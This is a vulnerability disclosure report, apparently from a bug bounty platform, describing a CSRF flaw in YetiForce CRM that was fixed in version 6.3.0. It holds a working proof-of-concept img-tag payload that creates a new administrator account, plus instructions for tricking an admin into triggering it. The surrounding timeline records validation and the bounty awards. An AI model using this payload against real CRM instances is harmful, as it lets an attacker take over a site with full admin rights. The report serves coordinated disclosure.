Cross-Site Request Forgery (CSRF) in yetiforcecompany/yetiforcecrm


Reported on Jan 12th 2022


Hi there, I would like to report a CSRF vulnerability in yetiforcecompany/yetiforcecrm. This allows an attacker to create a new admin. Even when SameSite: Strict is enabled, this can still be exploited by an attacker with a lowest-privilege account (e.g. guest).

Proof of Concept

  • These are POCs for 2 scenarios; both lead to the creation of a new admin with username testggwp and password Admin@123.

  • Scenario 1: SameSite is None or Lax

  • Trick the admin into accessing the link below.

  • Scenario 2: SameSite is Strict

  • Create a record in Documents with the payload below in the description (click Source, then paste). After that, trick the admin into visiting the record.

<img src="/index.php?module=Users&parent=Settings&view=Edit&fromView=Create&action=Save&picklistDependency=%5b%5d&mappingRelatedField=%5b%5d&listFilterFields=%5b%5d&defaultOtherEventDuration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a%2260%22%7d%5d&user_name=testggwp&is_admin=1&first_name=testggwp&last_name=testggwp&roleid=H14&status=Active&user_password=Admin@123&confirm_password=Admin@123&super_user=1&"> 


After the CSRF payload is triggered, the attacker can become an admin with full privileges.

We are processing your report and will contact the yetiforcecompany/yetiforcecrm team within 24 hours. (2 years ago)
A GitHub Issue asking the maintainers to create a exists. (2 years ago)
We have contacted a member of the yetiforcecompany/yetiforcecrm team and are waiting to hear back. (2 years ago)
We have sent a follow up to the yetiforcecompany/yetiforcecrm team. We will try again in 7 days. (2 years ago)
(2 years ago)


Thank you for the report. We're currently working on a fix that will be released soon, and then we'll take care of this report. Thanks.

Radosław Skrzypczak validated this vulnerability 2 years ago
supernaruto16 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Radosław Skrzypczak marked this as fixed in 6.3.0 with commit 298c78 2 years ago
Radosław Skrzypczak has been awarded the fix bounty
This vulnerability will not receive a CVE